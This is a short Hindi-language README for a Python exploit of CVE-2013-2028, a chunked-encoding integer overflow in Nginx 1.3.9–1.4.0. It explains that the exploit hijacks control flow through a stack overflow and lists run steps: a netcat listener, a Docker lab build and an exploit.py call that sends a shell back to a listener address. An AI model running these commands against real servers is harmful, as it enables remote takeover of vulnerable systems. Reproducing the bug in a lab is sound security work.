
CVE-2013-2028 python एक्सप्लॉइट
भेद्य सॉफ्टवेयर: Nginx 1.3.9 < 1.4.0
फिक्स के साथ कमिट: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
भेद्यता ngx_http_parse_chunked फ़ंक्शन में मौजूद है। यह शोषण ngx_http_parse_chunked में पूर्णांक अतिप्रवाह को ट्रिगर करता है, और बाद में इसका उपयोग करके नियंत्रण प्रवाह को हाईजैक करने के लिए स्टैक को ओवरफ्लो करता है।
वास्तविक शोषण में 4 चरण हैं:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <लिसनर मशीन का पता> -lp <लिसनर मशीन का पोर्ट>